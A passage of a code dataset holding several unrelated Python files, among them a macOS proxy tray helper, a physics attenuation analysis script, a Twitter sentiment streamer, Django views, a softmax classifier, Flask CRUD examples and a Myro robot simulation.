filter(lambda service: service and service.find('*') == -1 and getProxyState(service) != 'disable',\n services) # Remove disabled services and empty lines\n\n if len(services) > 0:\n print('helperDisableAutoProxy')\n os._exit(0)\n AppKit.NSApp.terminate_(self)\n\n def disableProxy_(self, _):\n print(\"disableProxy_\")\n\n\ndef getCurrentServiceMenuItemTitle():\n if currentService:\n return 'Connection: %s' % currentService\n else:\n return 'Connection: None'\n\n\ndef getProxyState(service):\n if not service:\n return\n\n # Check if auto proxy is enabled\n executeResult = subprocess.check_output(['networksetup', '-getautoproxyurl', service])\n if (executeResult.find('http://127.0.0.1:8086/proxy.pac\\nEnabled: Yes') != -1):\n return \"pac\"\n\n # Check if global proxy is enabled\n executeResult = subprocess.check_output(['networksetup', '-getwebproxy', service])\n if (executeResult.find('Enabled: Yes\\nServer: 127.0.0.1\\nPort: 8087') != -1):\n return \"gae\"\n\n # Check if global proxy is enabled\n if (executeResult.find('Enabled: Yes\\nServer: 127.0.0.1\\nPort: 1080') != -1):\n return \"x_tunnel\"\n\n if (executeResult.find('Enabled: Yes\\nServer: 127.0.0.1\\nPort: 8086') != -1):\n return \"smart_router\"\n\n return \"disable\"\n\n\n# Generate commands for Apple Script\ndef getEnableAutoProxyCommand(service):\n return \"networksetup -setautoproxyurl \\\\\\\"%s\\\\\\\" \\\\\\\"http://127.0.0.1:8086/proxy.pac\\\\\\\"\" % service\n\n\ndef getDisableAutoProxyCommand(service):\n return \"networksetup -setautoproxystate \\\\\\\"%s\\\\\\\" off\" % service\n\n\nsys_tray = MacTrayObject.alloc().init()\ncurrentService = None\n\n\ndef fetchCurrentService(protocol):\n global currentService\n status = SystemConfiguration.SCDynamicStoreCopyValue(None, \"State:/Network/Global/\" + protocol)\n if not status:\n currentService = None\n return\n serviceID = status['PrimaryService']\n service = SystemConfiguration.SCDynamicStoreCopyValue(None, \"Setup:/Network/Service/\" + serviceID)\n if not service:\n currentService = None\n return\n currentService = service['UserDefinedName']\n\n@AppKit.objc.callbackFor(AppKit.CFNotificationCenterAddObserver)\ndef networkChanged(center, observer, name, object, userInfo):\n fetchCurrentService('IPv4')\n # loadConfig()\n sys_tray.updateStatusBarMenu()\n\n\n# Note: the following code can't run in class\ndef serve_forever():\n app = AppKit.NSApplication.sharedApplication()\n app.setDelegate_(sys_tray)\n\n # Listen for network change\n nc = AppKit.CFNotificationCenterGetDarwinNotifyCenter()\n AppKit.CFNotificationCenterAddObserver(nc, None, networkChanged, \"com.apple.system.config.network_change\", None, AppKit.CFNotificationSuspensionBehaviorDeliverImmediately)\n\n # fetchCurrentService('IPv4')\n AppHelper.runEventLoop()\n\n\ndef main():\n serve_forever()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"other/mac_tray/mac_tray.py","file_name":"mac_tray.py","file_ext":"py","file_size_in_byte":8395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"263233780","text":"import numpy as np\nfrom uncertainties import unumpy as unp\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\nfrom uncertainties import ufloat\nfrom scipy.stats import sem\n\nnullmessung = ufloat(8343, 118)\nnullmessung = ufloat(noms(nullmessung), stds(nullmessung)+np.sqrt(noms(nullmessung)))/60\nprint('Nullmessung', nullmessung)\n\nx = np.sqrt(2)\nzahl = np.linspace(1,9,9)\nstrecke4 = np.array([3*x, 2*x, 3, 3])\nstrecke12 = np.array([2*x, 3*x, 2*x, 3, 3, 3, 2*x, 3*x, 2*x, 3, 3, 3])\n\ndef function_mu(intensity, depth):\n return unp.log(nullmessung/intensity)/depth\n\nzahl1, counts1, fehler1 = np.genfromtxt('data/wuerfel-1.csv', unpack=True, delimiter=',')\ncounts1 = unp.uarray(counts1, np.sqrt(counts1)+fehler1)/60\n\naludicke = np.ones(12)*0.2\nmu1 = function_mu(counts1, aludicke)\nnp.savetxt('build/wuerfel-1-daten.csv', np.column_stack([zahl1, counts1, mu1]), fmt='%0.0f & %r & %r', delimiter=' & ')\nmean1 = np.mean(mu1)\nprint('Wuerfel 1: μ ', mean1)\nmn1 = f'{mean1}'[:4]\nsm1 = f'{mean1}'[-2:]\nprint(mn1, '+/-', sm1)\nwith open('build/wuerfel-1-mu.tex', 'w') as file:\n file.write(r'μ_\\text{Al} &= (\\num{')\n file.write(f'{mn1}({sm1})')\n file.write(r'})\\:\\frac{1}{\\si{\\centi\\meter}}')\nmean1 /= 2.71\nprint('Wuerfel 1: μ ', mean1)\nmn1 = f'{mean1}'[:4]\nsm1 = f'{mean1}'[-1:]\nprint(mn1, '+/-', sm1)\nwith open('build/wuerfel-1-al.tex', 'w') as file:\n file.write(r'μ_\\text{Al} &= \\SI{')\n file.write(f'{mn1}({sm1})')\n file.write(r'}{\\centi\\meter\\squared\\per\\gram}')\n# Abschwaechung durch die Aluminiumhuelle\nalabsch = counts1/nullmessung\nnp.savetxt('build/wuerfel-1-aluminium-abschwaechung.csv', np.column_stack([zahl1, alabsch]), fmt='%r', delimiter=' & ')\nalabsch = np.mean(alabsch)\nprint('Aluminium Abschwaechung: ', alabsch)\nmn1 = f'{alabsch}'[:5]\nsm1 = f'{alabsch}'[-2:]\nprint(mn1, '+/-', sm1)\nwith open('build/aluminium-abschwaechung.tex', 'w') as file:\n file.write(r'c_\\text{Al} &= \\num{')\n file.write(f'{mn1}({sm1})')\n file.write(r'}')\n\nzahl2, counts2, fehler2 = np.genfromtxt('data/wuerfel-2.csv', unpack=True, delimiter=',')\ncounts2 /= 0.729\ncounts2 = unp.uarray(counts2, np.sqrt(counts2)+fehler2)/150\nmu2 = function_mu(counts2, strecke4)\nnp.savetxt('build/wuerfel-2-daten.csv', np.column_stack([zahl2, counts2, mu2]), fmt='%0.0f & %r & %r', delimiter=' & ')\nmean2 = np.mean(mu2)\nprint('Wuerfel 2: ', mean2)\nmn2 = f'{noms(mean2):1.3f}'\nsm2 = f'{stds(mean2):1.3f}'[-2:]\nprint(mn2, '+/-', sm2)\nwith open('build/wuerfel-2-mu.tex', 'w') as file:\n file.write(r'μ_{W2} &= \\SI{')\n file.write(f'{mn2}({sm2})')\n file.write(r'}{\\per\\centi\\meter}')\n\nzahl3, counts3, fehler3 = np.genfromtxt('data/wuerfel-3.csv', unpack=True, delimiter=',')\ncounts3 /= 0.729\ncounts3 = unp.uarray(counts3, np.sqrt(counts3)+fehler3)/100\nmu3 = function_mu(counts3, strecke4)\nnp.savetxt('build/wuerfel-3-daten.csv', np.column_stack([zahl3, counts3, mu3]), fmt='%0.0f & %r & %r', delimiter=' & ')\nmean3 = np.mean(mu3)\nprint('Wuerfel 3: ', mean3)\nmn3 = f'{noms(mean3):1.3f}'\nsm3 = f'{stds(mean3):1.3f}'[-1:]\nprint(mn3, '+/-', sm3)\nwith open('build/wuerfel-3-mu.tex', 'w') as file:\n file.write(r'μ_{W3} &= \\SI{')\n file.write(f'{mn3}({sm3})')\n file.write(r'}{\\per\\centi\\meter}')\n\nmatrix = np.array([\n[0, x, 0, x, 0, 0, 0, 0, 0],\n[0, 0, x, 0, x, 0, x, 0, 0],\n[0, 0, 0, 0, 0, x, 0, x, 0],\n[1, 1, 1, 0, 0, 0, 0, 0, 0],\n[0, 0, 0, 1, 1, 1, 0, 0, 0],\n[0, 0, 0, 0, 0, 0, 1, 1, 1],\n[0, x, 0, 0, 0, x, 0, 0, 0],\n[x, 0, 0, 0, x, 0, 0, 0, x],\n[0, 0, 0, x, 0, 0, 0, x, 0],\n[0, 0, 1, 0, 0, 1, 0, 0, 1],\n[0, 1, 0, 0, 1, 0, 0, 1, 0],\n[1, 0, 0, 1, 0, 0, 1, 0, 0],\n])\ntranmatrix = matrix.T\nzmatrix = tranmatrix.dot(matrix)\ninvmatrix = np.linalg.inv(zmatrix)\numrechnungs_matrix = invmatrix.dot(tranmatrix)\n\nzahl5, counts5, fehler5 = np.genfromtxt('data/wuerfel-5.csv', unpack=True, delimiter=',')\ncounts5 /= 0.729\ncounts5 = unp.uarray(counts5, np.sqrt(counts5)+fehler5)/100\nlncounts5 = unp.log(nullmessung/counts5)\nmu5 = umrechnungs_matrix.dot(lncounts5)\nnp.savetxt('build/wuerfel-5-daten.csv', np.column_stack([zahl5, counts5, lncounts5]), fmt='%0.0f & %r & %r', delimiter=' & ')\neisen = 0.57842404\nmessing = 0.6146008\nmu5p = unp.uarray(nominal_values=[1,2,3,4,5,6,7,8,9],std_devs=[1,2,3,4,5,6,7,8,9])\nfor i in range(9):\n if i == 0 or i == 3 or i == 6 or i == 7 or i == 8:\n mu5p[i] = (messing-mu5[i])/messing*100\n else:\n mu5p[i] = (eisen-mu5[i])/eisen*100\nprint(mu5p)\nnp.savetxt('build/wuerfel-5.csv', np.column_stack([zahl, mu5]), fmt='%r', delimiter=' & ')\n\nprint('========================\\n Prozentuale Fehler')\nfrom uncertainties import unumpy as unp\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\nfrom uncertainties import ufloat\n\nw2 = ufloat(0.603, 0.010)\nw2p = (messing-w2)/messing*100\nprint('w2p', w2p)\n\nw3 = ufloat(0.076, 0.009)\nw3p = (eisen-w3)/eisen*100\nprint('w3p', w3p)\n","sub_path":"v14-tomographie/python-skripts/wuerfel.py","file_name":"wuerfel.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"348369965","text":"import requests\nimport os\nimport json\nimport config\n\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n\nclass TwitterStream:\n def __init__(self, bearer_token, timeframe=60, verbose=True):\n self.verbose = verbose\n self.bearer_token = bearer_token\n self.timeframe = timeframe\n self.headers = None\n if self.verbose:\n print(\"Resetting rules\")\n self.resetRules()\n if (self.verbose):\n print(\"Ready to start\")\n\n def start(self):\n analyzer = SentimentIntensityAnalyzer()\n self.get_stream(set, analyzer)\n\n def resetRules(self):\n self.headers = self.create_headers()\n rules = self.get_rules()\n delete = self.delete_all_rules(rules)\n set = self.set_rules(delete)\n\n def create_headers(self):\n headers = {\"Authorization\": \"Bearer {}\".format(self.bearer_token)}\n return headers\n\n def get_rules(self):\n response = requests.get(\n \"https://api.twitter.com/2/tweets/search/stream/rules\", headers=self.headers\n )\n if response.status_code != 200:\n raise Exception(\n \"Cannot get rules (HTTP {}): {}\".format(\n response.status_code, response.text)\n )\n return response.json()\n\n def delete_all_rules(self, rules):\n if rules is None or \"data\" not in rules:\n return None\n\n ids = list(map(lambda rule: rule[\"id\"], rules[\"data\"]))\n payload = {\"delete\": {\"ids\": ids}}\n response = requests.post(\n \"https://api.twitter.com/2/tweets/search/stream/rules\",\n headers=self.headers,\n json=payload\n )\n if response.status_code != 200:\n raise Exception(\n \"Cannot delete rules (HTTP {}): {}\".format(\n response.status_code, response.text\n )\n )\n\n def set_rules(self, delete):\n sample_rules = [\n {\"value\": \"#Eth Ethereum lang:en\"}\n ]\n payload = {\"add\": sample_rules}\n response = requests.post(\n \"https://api.twitter.com/2/tweets/search/stream/rules\",\n headers=self.headers,\n json=payload,\n )\n if response.status_code != 201:\n raise Exception(\n \"Cannot add rules (HTTP {}): {}\".format(\n response.status_code, response.text)\n )\n\n def get_stream(self, set, analyzer):\n response = requests.get(\n \"https://api.twitter.com/2/tweets/search/stream\", headers=self.headers, stream=True,\n )\n if self.verbose:\n print(\"Connected to stream with status code {}\".format(\n response.status_code))\n if response.status_code != 200:\n raise Exception(\n \"Cannot get stream (HTTP {}): {}\".format(\n response.status_code, response.text\n )\n )\n for response_line in response.iter_lines():\n if response_line:\n json_response = json.loads(response_line)\n text = json_response['data']['text']\n score = analyzer.polarity_scores(text)\n if self.verbose:\n print(\"{:-<65} {}\".format(text, str(score)))\n\n\n","sub_path":"src/utilities/stream_data.py","file_name":"stream_data.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"287998432","text":"from models import QuestaoSubjetiva, RespostaSubjetiva\nfrom questao.forms import QuestaoForm\nfrom django import forms\n\nclass QuestaoSubjetivaForm(QuestaoForm):\n class Meta:\n model = QuestaoSubjetiva\n exclude = ['questionarios', 'criador', 'nivel_dinamico']\n def __init__(self, *args, **kwargs):\n super(QuestaoSubjetivaForm, self).__init__(*args, **kwargs)\n self.fields['resposta'] = forms.CharField(widget=forms.Textarea(attrs={'class':\"cleditor\", 'rows':7, 'cols':60}))\n\nclass RespostaSubjetivaForm(forms.ModelForm):\n class Meta:\n model = RespostaSubjetiva\n exclude = [\"submissao\", \"questao\"]\n \n def __init__(self, questao, *args, **kwargs):\n super(RespostaSubjetivaForm, self).__init__(*args, **kwargs)\n self.questao = questao\n self.fields['resposta'] = forms.CharField(widget=forms.Textarea(attrs={'class':\"cleditor\", 'rows':7, 'cols':60}))\n \nQuestaoSubjetiva.RespostaForm = RespostaSubjetivaForm\n\n","sub_path":"quest/questao/subjetiva/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"192923381","text":"from django.shortcuts import render\nfrom .models import Games, GamesCategory, Users,Comments\nfrom django.http import JsonResponse, HttpResponse\nfrom django.core import serializers\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\n\n\ndef getGameCategories(request):\n gameCategories = GamesCategory.objects.all()\n data = serializers.serialize('json', gameCategories)\n return HttpResponse(data)\n\n\ndef getGames(request):\n games = Games.objects.all()\n data = serializers.serialize('json', games)\n return HttpResponse(data)\n\n\ndef getGamesByCategory(request, category_id):\n games = Games.objects.filter(category__id=category_id)\n data = serializers.serialize('json', games)\n return HttpResponse(data)\n\n\ndef getGameByName(request, gameName):\n game = Games.objects.filter(name=gameName)[:1]\n data = serializers.serialize('json', game)\n return HttpResponse(data)\n\n\n@csrf_exempt\ndef getUsers(request):\n if request.method == 'GET':\n users = Users.objects.all()\n data = serializers.serialize('json', users)\n return HttpResponse(data)\n elif request.method == 'POST':\n body_unicode=request.body.decode('utf-8')\n body=json.loads(body_unicode)\n userName=body['name']\n userEmail=body['email']\n userPassword=body['password']\n user=Users(name=userName,email=userEmail,password=userPassword)\n user.save()\n return HttpResponse(\"user was created\", status=201)\n\ndef getUserByName(request,userName):\n user=Users.objects.filter(name=userName)[:1]\n data = serializers.serialize('json', user)\n return HttpResponse(data)\n\n@csrf_exempt\ndef comments(request):\n if request.method=='GET':\n comments=Comments.objects.all()\n data = serializers.serialize('json', comments)\n return HttpResponse(data)\n elif request.method=='POST':\n body_unicode=request.body.decode('utf-8')\n body=json.loads(body_unicode)\n commentText=body['comment']\n userId=body['userComments']\n user=Users.objects.filter(id=userId)[:1]\n user1=user[0]\n comment=Comments(comment=commentText,userComments=user1)\n comment.save()\n return HttpResponse(\"comment was added\",status=201)\n\ndef getUserByID(request,userID):\n users=Users.objects.filter(pk=userID)[:1]\n data=serializers.serialize('json',users)\n return HttpResponse(data)\n","sub_path":"geeko_backend/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"213217417","text":"#!/usr/bin/python\n\nimport numpy as np\nfrom numpy import dot, random\nimport matplotlib.pyplot as plt\nimport time\n\ndef softmax(x):\n exps = np.nan_to_num(np.exp(x))\n return exps/np.nan_to_num(np.sum(exps))\n\nclass classifier(object):\n def __init__(self, input_size, classes, debug=True):\n '''Initialize the classifier with the input vector size\n and the number of classes required'''\n self.input_size = input_size\n self.classes = classes\n self.W = random.randn(input_size, classes)\n self.b = random.randn(classes, 1)\n self.DEBUG = debug\n self.cost_over_time = np.zeros(100)\n self.l = 0.1\n\n def setDebug(lev=True):\n self.DEBUG = lev\n\n def getCostOverTime():\n return self.cost_over_time\n\n def Y(self, train_data):\n '''The model that predicts the class of the input vectors using\n the current parmeters.'''\n a = dot(train_data, self.W) + np.tile(self.b.flatten(), (len(train_data), 1))\n return np.array([softmax(x) for x in a])\n\n def costf(self, train_data, train_targets):\n '''The traindata should contain the training inputs and\n train_targets the target vectors. Evaluates the cross entropy cost\n with the current set of data and parameters'''\n Y = self.Y(train_data)\n J = -sum([dot(t, ly) for t,ly in zip(train_targets, np.nan_to_num(np.log(np.nan_to_num(Y))))])\\\n + 0.5*self.l*(np.linalg.norm(self.W))**2\n return J\n\n def grad_costf(self, train_data, train_targets):\n '''Computes the gradient of the cost function for a batch. This one was hell\n to calculate by hand but I did it.'''\n Y = self.Y(train_data)\n gradW = dot(train_data.T, (Y - train_targets)) + 2*self.l*self.W\n gradb = np.reshape(np.sum(Y - train_targets, axis=0), (self.classes, 1)) \n return gradW, gradb\n\n def GD(self, train_data, train_targets, epochs=30, eta=0.01):\n '''Trains the classifier using gradient descent. Uses the entire\n dataset for a single epoch. Maybe I\\'ll implement the stochastic\n version soon.'''\n #Reserve the array \n self.cost_over_time = np.zeros(epochs)\n #Start the training\n for i in range(epochs):\n print(\"Training Epoch %d...\"%(i))\n gradW, gradb = self.grad_costf(train_data, train_targets)\n self.W = self.W - eta*gradW\n self.b = self.b - eta*gradb\n if self.DEBUG:\n cost = self.costf(train_data, train_targets)\n self.cost_over_time[i] = cost\n print(\"Cost: \"+str(cost))\n print(\"Done\")\n\n def SGD(self, train_data, train_targets, batch_size=10, epochs=30, eta=0.01, momentum=0.999):\n '''Trains the data using stochastic gradient descent.'''\n self.cost_over_time = np.zeros(epochs)\n et = eta\n for i in range(epochs):\n print(\"Training Epoch %d...\"%(i))\n #Split the data into mini batches\n NROWS = train_data.shape[0]\n ROWS = [n for n in range(NROWS)]\n random.shuffle(ROWS)\n batches = [ROWS[n:n+batch_size] for n in range(0,NROWS,batch_size)] \n \n for batch in batches:\n #Compute the gradient for the mini batches\n gradW, gradb = self.grad_costf(train_data[batch,:], train_targets[batch,:])\n #Do gradient descent for each of the mini batches\n self.W = self.W - et*gradW\n self.b = self.b - et*gradb\n \n if self.DEBUG:\n cost = self.costf(train_data, train_targets)\n self.cost_over_time[i] = cost\n print(\"Cost: \"+str(cost))\n et = eta*momentum\n print(\"Done\")\n\n def evalData(self, test_data, test_targets):\n '''Takes the testing data and calculates the number of\n incorrectly classified inputs'''\n Y = self.Y(test_data)\n TOTAL = test_data.shape[0]\n corrects = np.array(np.argmax(Y, axis=1) == np.argmax(test_targets, axis=1), dtype=float)\n pcor = 100*sum(corrects)/TOTAL\n print(\"Percentage correctly Classified: \"+str(pcor))\n return pcor/100.\n\n\nif __name__=='__main__':\n #Create dummy data for the classes\n cl1 = random.multivariate_normal([0, 2], 0.2*np.identity(2), 100)\n cl2 = random.multivariate_normal([0, -2], 0.2*np.identity(2), 100)\n cl3 = random.multivariate_normal([2, 0], 0.2*np.identity(2), 100)\n cl4 = random.multivariate_normal([-2, 0], 0.2*np.identity(2), 100)\n cl5 = random.multivariate_normal([-5, 0], 0.2*np.identity(2), 100)\n t1 = np.tile([1,0,0,0,0], (len(cl1), 1))\n t2 = np.tile([0,1,0,0,0], (len(cl2), 1))\n t3 = np.tile([0,0,1,0,0], (len(cl3), 1))\n t4 = np.tile([0,0,0,1,0], (len(cl4), 1))\n t5 = np.tile([0,0,0,0,1], (len(cl5), 1))\n \n #Everyday I'm shuffling\n DATA = np.vstack((cl1, cl2, cl3, cl4, cl5))\n TARGS = np.vstack((t1, t2, t3, t4, t5))\n COMB = np.hstack((DATA, TARGS))\n #Shufflin' shufflin' shufflin'\n np.random.shuffle(COMB)\n X = COMB[:,:2]\n T = COMB[:,2:]\n\n #And plotting\n plt.scatter(X[:,0], X[:,1])\n plt.title('Unclassified data plot')\n\n clf = classifier(2, 5)\n clf.SGD(X, T, epochs=100, eta=0.01, batch_size=20)\n\n plt.figure()\n plt.title('Cost over time')\n plt.plot(clf.cost_over_time)\n plt.ylabel('Cost')\n plt.xlabel('Epochs')\n\n #Trying to visualize the decision boundary\n h = 0.05\n x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n Z = np.argmax(clf.Y(np.c_[xx.ravel(), yy.ravel()]), axis=1)\n \n # Put the result into a color plot\n plt.figure()\n plt.title('Plot of the decision boundaries')\n Z = Z.reshape(xx.shape)\n plt.contourf(xx, yy, Z, cmap=plt.cm.Paired)\n plt.axis('off')\n\n # Plot also the training points\n plt.scatter(X[:, 0], X[:, 1], c=np.argmax(T,axis=1), cmap=plt.cm.Paired)\n\n plt.show()\n","sub_path":"assignment-4/multiclass_logistic_reg.py","file_name":"multiclass_logistic_reg.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"17068492","text":"def parse_file(file_name):\n \"\"\"\n Parse file info\n\n :param file_name: File path\n :return: List of the cities names from file\n \"\"\"\n cities_l = list()\n file = open(file_name, \"r\")\n for city in file:\n cities_l.append(city)\n return cities_l\n","sub_path":"common/parse_file.py","file_name":"parse_file.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"104646847","text":"# The table has been created by running BasicModelApp and SetUpDatabase we can play around with CRUD commands\n# Our goal here is to just familiarize ourselves with CRUD commands\n\nfrom BasicModelApp import db,Puppy\n\n\n# Create\nmy_puppy = Puppy('Rufus',5)\ndb.session.add(my_puppy)\ndb.session.commit()\n\n\n# Read\n# ORM filter options: Filter(), filter_by(), limit(), order_by(), group_by()\n# Executor options: all(), first(), get(), count(), paginate()\n\n# list of all puppies in table\nall_puppies = Puppy.query.all() \nprint(all_puppies)\nprint('\\n')\n\n# Grab by id\npuppy_one = Puppy.query.get(1)\nprint(puppy_one)\nprint(puppy_one.age)\nprint('\\n')\n\n# Filters\npuppy_sam = Puppy.query.filter_by(name='Sammy') # Returns list\nprint(puppy_sam)\nprint('\\n')\n\n\n# Update\n# Grab data, modify, then save changes.\nfirst_puppy = Puppy.query.get(1)\nfirst_puppy.age = 10\ndb.session.add(first_puppy)\ndb.session.commit()\n\n\n# Delete\nsecond_pup = Puppy.query.get(2)\ndb.session.delete(second_pup)\ndb.session.commit()\n\n\n# Check for changes:\nall_puppies = Puppy.query.all() # list of all puppies in table\nprint(all_puppies)\n","sub_path":"07_SQL_Databases_with_Flask/Model and CRUD/BasicCRUD.py","file_name":"BasicCRUD.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"88172106","text":"\"\"\"\ntest_commands.py\n\nTests for commands.py\n\"\"\"\n\n# core\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n# project\nimport commands\n\ndef test_get_minutes_seconds():\n # 67 seconds should equal ...\n test_seconds = 67\n # ... 1 minute 7 seconds\n expected = (1, 7)\n result = commands.get_minutes_seconds(test_seconds)\n\n assert result == expected\n\ndef test_make_time_string_sing():\n\n test_seconds = 67\n expected = \"1 minute and 7 seconds\"\n result = commands.make_time_string(test_seconds)\n\n assert result == expected\n\ndef test_make_time_string_plural():\n\n test_seconds = 127\n expected = \"2 minutes and 7 seconds\"\n result = commands.make_time_string(test_seconds)\n\n assert result == expected","sub_path":"tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"310704898","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build\\bdist.win32\\egg\\pyramid_turbolinks\\__init__.py\n# Compiled at: 2014-11-04 02:21:20\nfrom __future__ import unicode_literals\n__major__ = 1\n__minor__ = 0\n__revision__ = 0\n__version_info__ = (\n __major__, __minor__, __revision__)\n__version__ = b'%s.%s' % (__major__, __minor__)\ntry:\n from urlparse import urlparse\nexcept ImportError:\n from urllib.parse import urlparse\n\ntry:\n from pyramid.events import NewRequest, NewResponse\n from pyramid.httpexceptions import HTTPForbidden\nexcept ImportError:\n pass\n\ndef same_origin(current_uri, redirect_uri):\n a = urlparse(current_uri)\n if not a.scheme:\n return True\n b = urlparse(redirect_uri)\n return (\n a.scheme, a.hostname, a.port) == (b.scheme, b.hostname, b.port)\n\n\ndef process_request(event):\n request = event.request\n referrer = request.environ.get(b'HTTP_X_XHR_REFERER')\n if referrer:\n request.environ[b'HTTP_REFERER'] = referrer\n\n\ndef process_response(event):\n request = event.request\n response = event.response\n referrer = request.headers.get(b'X-XHR-Referer')\n if not referrer:\n return response\n method = request.cookies.get(b'request_method')\n if not method or method != request.method:\n response.set_cookie(b'request_method', request.method)\n if response.location:\n request.session[b'_turbolinks_redirect_to'] = response.location\n if referrer and not same_origin(response.location, referrer):\n return HTTPForbidden()\n elif request.session.get(b'_turbolinks_redirect_to'):\n loc = request.session.pop(b'_turbolinks_redirect_to')\n response[b'X-XHR-Redirected-To'] = loc\n return response\n\n\ndef includeme(config):\n config.add_subscriber(process_request, NewRequest)\n config.add_subscriber(process_response, NewResponse)\n config.add_static_view(b'turbolinks', b'pyramid_turbolinks:static')","sub_path":"pycfiles/pyramid_twitcher-0.6.0.tar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584065776","text":"from Myro import *\n\nfrom Graphics import *\n\nfrom math import *\n\n\n\n#overridden functions for the user\n\ndef getLine():\n\n #print(\"custom get line\")\n\n leftSensor = 0;\n\n rightSensor = 0;\n\n robot=getRobot()\n\n if robot != None:\n\n IR_Loc1 = [-12,5]\n\n IR_Loc2 = [-12,-5]\n\n loc = [robot.frame.getX(),robot.frame.getY()]\n\n theta = -1*radians(robot.frame.rotation)\n\n newIR_Loc1 = [cos(theta)*IR_Loc1[0] - sin(theta)*IR_Loc1[1] + loc[0],\n\n sin(theta)*IR_Loc1[0] + cos(theta)*IR_Loc1[1] + loc[1]]\n\n newIR_Loc2 = [cos(theta)*IR_Loc2[0] - sin(theta)*IR_Loc2[1] + loc[0],\n\n sin(theta)*IR_Loc2[0] + cos(theta)*IR_Loc2[1] + loc[1]]\n\n #newIR_Loc1 = [cos(theta)*IR_Loc1[0] - sin(theta)*IR_Loc1[1],\n\n # sin(theta)*IR_Loc1[0] + cos(theta)*IR_Loc1[1]]\n\n #newIR_Loc2 = [cos(theta)*IR_Loc2[0] - sin(theta)*IR_Loc2[1],\n\n # sin(theta)*IR_Loc2[0] + cos(theta)*IR_Loc2[1]]\n\n sim=getSimulation()\n\n for s in sim.window.canvas.shapes:\n\n if s.ToString().find(\"Picture\") != -1 and s.tag==\"Tile\":\n\n if s.hit(newIR_Loc1[0],newIR_Loc1[1]):\n\n r,g,b,a=s.getRGBA(newIR_Loc1[0],newIR_Loc1[1])\n\n if r==0 and g==0 and b==0 and a==255: \n\n leftSensor = 1\n\n if s.hit(newIR_Loc2[0],newIR_Loc2[1]):\n\n r,g,b,a=s.getRGBA(newIR_Loc2[0],newIR_Loc2[1])\n\n if r==0 and g==0 and b==0 and a==255:\n\n rightSensor = 1\n\n \n\n else:\n\n print(\"no robot for getline\")\n\n return [rightSensor,leftSensor]\n\n \n\n'''\n\nsim = Simulation(\"lineWorld\", 700, 700, Color(\"white\"))\n\n\n\nrobot=makeRobot(\"SimScribbler\", sim)\n\nrobot.frame.outline=makeColor(0,0,0,0)\n\nrobot.setPose(375,675,-90)\n\n \n\nsim.setup\n\n'''\n\n\n\n# create and name world; give window size, and background color\n\nsim = Simulation(\"My World\", 695, 273, Color(\"white\"))\n\n\n\n# walls for sim world; top left of rectanlge coordinate by bottom right rectangle coordinate\n\nsim.addWall((0, 0), (10, 273), Color(\"blue\"))\n\nsim.addWall((10, 0), (695, 10), Color(\"blue\"))\n\nsim.addWall((685, 10), (695, 90), Color(\"blue\"))\n\nsim.addWall((685, 170), (695, 273), Color(\"blue\"))\n\nsim.addWall((0, 263), (695, 273), Color(\"blue\"))\n\n\n\n#name robot and put it in \"sim\" world\n\nr=makeRobot(\"SimScribbler\", sim)\n\n\n\n# set robot position; x, y coordinates, way robot is facing by degree 0=horizontal with front facing east\n\nr.setPose(35,135,0)\n\n\n\n# picture of line to load into sim for line following, must draw line in paint and save as .png file\n\n# or line function will not work\n\n# change p=Picture(\"name of your file.png\") and nothing else\n\np=Picture(\"seqPicture.png\")\n\np.draw(sim.window)\n\np.tag=\"Tile\"\n\np.stackOnBottom()\n\n\n\nsim.setup()\n#Defining Switch statements in python with a dictionary\n#there is not a case statement in python.\n\n\n\ndef spin(): #bot spins around 360 degrees.\n for counter in range (0,4):\n turnBy(90)\n \ndef playSong():\n s=readSong(\"chariot.txt\")\n r.playSong(s)\n \n\n# function that will make the robot beep if it is called and a line\n\n# is detected\n\ndef beepLine():\n\n # left and right must be initialized like this for use\n left, right = getLine()\n \n\n if left==1 and right==1:\n print(\"Line was detected. Beep!\")\n #beep(1, 300)\n return True\n else:\n print(\"No line was detected. Stay Silent\")\n return False\n \n \nactions = {\n 1: [spin],\n 2: [playSong],\n 3: [spin, playSong,spin] \n }\n \n \ndef botPerform(func_list):\n for f in func_list:\n f() \n \n \ndef stuff():\n wait(10)\n counter = 1; #counter for switch statement\n while(counter <=3): #will run till 3 lines are found.\n forward(1, 1)\n if(beepLine()):\n botPerform(actions[counter])\n 